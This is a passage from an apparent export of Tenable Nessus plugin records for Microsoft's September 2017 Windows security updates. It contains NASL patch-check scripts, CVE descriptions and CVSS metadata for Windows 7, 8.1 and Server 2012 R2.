script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-09';\nkbs = make_list('4038779', '4038777');\n\nif (get_kb_item(\"Host/patch_management_checks\"))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(\n os:'6.1',\n sp:1,\n rollup_date:'09_2017',\n bulletin:bulletin,\n rollup_kb_list:[4038779, 4038777]\n )\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:34:12", "description": "The remote Windows host is missing security update 4038793 or cumulative update 4038792. It is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681, CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server. An attacker who successfully exploited the vulnerability could either run arbitrary code on the DHCP failover server or cause the DHCP service to become nonresponsive. To exploit the vulnerability, an attacker could send a specially crafted packet to a DHCP server. However, the DHCP server must be set to failover mode for the attack to succeed. The security update addresses the vulnerability by correcting how DHCP failover servers handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8707, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM Host Agent Service of Remote Desktop Virtual Host role when it fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could issue a specially crafted certificate on the guest operating system that could cause the VM host agent service on the host operating system to execute arbitrary code. The Remote Desktop Virtual Host role is not enabled by default. An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system. The security update addresses the vulnerability by correcting how VM host agent service validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. To exploit the vulnerability, the user must either browse to a malicious website or be redirected to it. In an email attack scenario, an attacker could send an email message in an attempt to convince the user to click a link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 September 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8680", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8684", "CVE-2017-8686", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8713", "CVE-2017-8714", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8728", "CVE-2017-8733", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038792.NASL", "href": "https://www.tenable.com/plugins/nessus/103131", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103131);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8759\"\n );\n script_xref(name:\"MSKB\", value:\"4038792\");\n script_xref(name:\"MSFT\", value:\"MS17-4038792\");\n script_xref(name:\"MSKB\", value:\"4038793\");\n script_xref(name:\"MSFT\", value:\"MS17-4038793\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038793\nor cumulative update 4038792. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8707, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038792/windows-8-1-update-kb4038792\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?085e4d22\");\n # https://support.microsoft.com/en-us/help/4038793/windows-8-1-update-kb4038793\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf3ecec7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038793 or Cumulative update KB4038792.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038792', '4038793');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038792, 4038793])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:38:26", "description": "The remote Windows host is missing security update 4038781.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8734)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8738, CVE-2017-8753, CVE-2017-8756)\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A remote code execution vulnerability exists in the way Microsoft Edge handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8720)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles clipboard events. For an attack to be successful, an attacker must persuade a user to visit a malicious website and leave it open during clipboard activities. The update addresses the vulnerability by changing how Microsoft Edge handles clipboard events in the browser. (CVE-2017-8643)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - A vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-11766)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2017-8759)\n\n - A information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8677, CVE-2017-8681)\n\n - An information disclosure vulnerability exists in the way that the Windows 